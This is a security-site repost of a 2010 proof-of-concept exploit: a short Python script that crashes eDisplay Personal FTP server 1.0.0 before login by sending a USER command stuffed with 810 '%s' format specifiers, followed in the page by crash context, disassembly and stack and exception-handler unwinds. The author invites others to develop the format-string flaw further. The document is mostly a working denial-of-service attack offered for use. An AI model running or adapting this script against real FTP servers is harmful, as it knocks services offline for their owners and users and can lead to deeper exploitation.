首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
eDisplay Personal FTP server 1.0.0 Pre-Authentication DoS (PoC)
来源:vfocus.net 作者:loneferret 发布时间:2010-03-22  

# Title: eDisplay Personal FTP server 1.0.0 Pre-Authentication DoS (PoC)
# From: The eh?-Team || The Great White Fuzz (we're not sure yet)
# Found by: loneferret
# Hat's off to dookie2000ca
# Disvovery date: 16/03/2010
# Software link: http://edisplay-personal-ftp-server.software.informer.com/
# Tested on: Windows XP SP3 Professional
# Nod to the Exploit-DB Team

# Vendor informed via email : 17/03/2010

#!/usr/bin/python

#Pre-Authentication crash #1
#I say crash number 1 since there's another instance where it crashes with the USER command.
#Also many post-authentication commands also crash with the same buffer type (%n for example)
#with variant degrees of interesting CPU registry overwrites.
#It will crash if you send it about 40 '%s' really, but I've included my full session of 810 bytes sent.
#As always, if anyone wants to take this further go right ahead. Just be nice and don't forget who found it.

#CONTEXT DUMP
# EIP: 7e4287aa mov dl,[eax]
# EAX: 73736150 (1936941392) -> N/A
# EBX: 0000000a ( 10) -> N/A
# ECX: 73736150 (1936941392) -> N/A
# EDX: 00000000 ( 0) -> N/A
# EDI: 0012c9a6 ( 1231270) -> P(9d%s%s%s%s%s%s%s%s%s%s...%s%s%s%s%s%s%s%s%s%:UBsSHs%:vHEs<;T (stack)
# ESI: 73736151 (1936941393) -> N/A
# EBP: 0012c8e4 ( 1231076) -> P 9Hw331 Password required for Pthis control can act as an OLE drag/drop source,
#  and whether this process is started automatically
#  or under programmatic control.P(9d%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s (stack)
# ESP: 0012c89c ( 1231004) -> 9HwC(J :^:{P 9Hw331 Password required for Pthis control can act as an OLE drag/drop source, and whether this process is started automatically or under programmatic (stack)
# +00: 0139b8d0 ( 20560080) -> PWSOCK32.DLL (heap)
# +04: 77124880 (1997686912) -> N/A
# +08: 000000cd ( 205) -> N/A
# +0c: 00000000 ( 0) -> N/A
# +10: ffffffff (4294967295) -> N/A
# +14: 00000000 ( 0) -> N/A

#disasm around:
# 0x7e428794 push eax
# 0x7e428795 push byte 0x0
# 0x7e428797 push esi
# 0x7e428798 lea eax,[ebp+0x8]
# 0x7e42879b push eax
# 0x7e42879c call [0x7e4114b8]
# 0x7e4287a2 jmp 0x7e428747
# 0x7e4287a4 test eax,eax
# 0x7e4287a6 jz 0x7e42875e
# 0x7e4287a8 jmp 0x7e428747
# 0x7e4287aa mov dl,[eax]
# 0x7e4287ac inc eax
# 0x7e4287ad test dl,dl
# 0x7e4287af jnz 0x7e4287aa
# 0x7e4287b1 sub eax,esi
# 0x7e4287b3 xor esi,esi
# 0x7e4287b5 xor edx,edx
# 0x7e4287b7 cmp [ebp-0x28],edx
# 0x7e4287ba jnl 0x7e443411
# 0x7e4287c0 sub [ebp-0x18],eax
# 0x7e4287c3 cmp esi,edx

#stack unwind:
# FtpServX.dll:50e0989b
# FtpServX.dll:50e0a6d8
# FtpServX.dll:50e09d91
# USER32.dll:7e418734
# USER32.dll:7e418816
# USER32.dll:7e4189cd
# USER32.dll:7e4196c7
# MSVBVM60.DLL:7342a6b0
# MSVBVM60.DLL:7342a627
# MSVBVM60.DLL:7342a505

#SEH unwind:
# 0012fdf8 -> FtpServX.dll:50e1ceb4 mov eax,0x50e1fcf8
# 0012fe58 -> USER32.dll:7e44048f push ebp
# 0012ffa8 -> USER32.dll:7e44048f push ebp
# 0012ffe0 -> MSVBVM60.DLL:7350bafd push ebp
# ffffffff -> kernel32.dll:7c839ac0 push ebp


import socket

buffer = ("%s") * 810 # \x25\x73

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('xxx.xxx.xxx.xxx',21))
s.recv(1024)
s.send('USER '+buffer+'\r\n')
s.recv(1024)


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Apple Safari <= Tag (heap spra
·eDisplay Personal FTP server 1
·Woltlab Burning Board Teamsite
·KDE <= 4.4.1 Ksysguard RCE via
·Realtek Media Player Playlist
·eDisplay Personal FTP server 1
·Xilisoft Video Converter(.yuv
·JITed egg-hunter stage-0 shell
·Httpdx v1.5.3 Remote Break Ser
·ZKSoftware Biometric Attendenc
·ZippHo 3.0.6 (.zip) 0day stack
·no$gba 2.5c (.nds) local crash
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved